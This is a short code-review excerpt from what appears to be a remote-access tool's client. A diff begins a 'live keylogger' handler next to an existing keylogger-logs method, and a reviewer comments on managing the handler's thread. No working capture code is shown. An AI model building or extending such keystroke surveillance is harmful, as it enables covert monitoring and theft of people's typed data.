Client/Core/Commands/SurveillanceHandler.cs

```diff
@@ -217,5 +217,22 @@ public static void HandleGetKeyloggerLogs(Packets.ServerPackets.GetKeyloggerLogs
                 }
             }).Start();
         }
+
+        public static void HandleGetKeyloggerLiveResponse(Packets.ServerPackets.GetKeyloggerLive command, Client client)
+        {
+            new Thread(() =>
```

Comment:
Maybe the thread that runs this should be declared at class-level. Would be nice to make sure that, if this method is called again, we can check if the thread is running and either close it and run a new thread or just let the previous thread continue.